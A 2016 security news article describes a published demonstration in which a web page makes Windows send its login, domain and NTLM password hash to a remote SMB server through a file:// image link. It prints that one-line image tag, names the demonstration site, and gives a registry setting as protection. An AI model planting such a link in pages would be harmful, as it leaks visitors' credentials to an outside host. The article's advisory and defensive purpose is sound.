4 August 2016

Stealing your Windows user credentials just with a website


Stealing your Windows user credentials just with a website

Russian researcher ValdikSS made publicly available a little exploit, which can steal your Windows credentials (login and NTML hash) just by visiting a website. The issue is connected with the way Windows operating system treats file:// URIs. Once spotted, the operating system will send SMB NTLMSSP_NEGOTIATE request to attacker's server, revealing login, domain name and NTLM hash of your password.

Web page with fully working exploit is available here: hxxp://witch.valdikss.org.ru/

Do not visit this page from your corporate computer, as your password might be decrypted.

The page contains an image <img src=”file://witch.valdikss.org.ru/a”>, which triggers SMB negotiations.

Below is a screenshot for a stand-alone workstation:

As you can see from the screenshot, a simple password can be recovered from NTLM hash within several seconds. The collected hashes with strong passwords can be stored and decrypted later.

The exploit works on all modern operating Windows systems, including Windows 10. And it does not matter, which browser you use, as the request is handled by operating system.

The same rule applies for integrated Microsoft account. If you use your Microsoft account to login to your PC, then attackers can steal it too. In this case they might be able to access all Microsoft services, using Live ID, e.g. Skype, OneDrive, etc.

Protection

Use RestrictReceivingNTLMTraffic registry key to disable this behavior.

	 Windows Registry Editor Version 5.00
	 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
	 "RestrictReceivingNTLMTraffic"=dword:00000002
	 "RestrictSendingNTLMTraffic"=dword:00000002

Back to the list

Latest Posts

Cyber Security Week in Review: December 20, 2024

Cyber Security Week in Review: December 20, 2024

In brief: A suspected Russian cyberattack hits Ukraine's state registries, new ICS malware targets Mitsubishi and Siemens systems, and more.
20 December 2024
Major phishing campaign abuses HubSpot to steal credentials from European firms

Major phishing campaign abuses HubSpot to steal credentials from European firms

The attackers exploited the service’s legitimate functionality to create convincing phishing pages.
19 December 2024
UAC-0125 malware campaign targeting Ukrainian military personnel

UAC-0125 malware campaign targeting Ukrainian military personnel

Victims are lured to fraudulent websites offering to download a malicious version of the Army+ app.
19 December 2024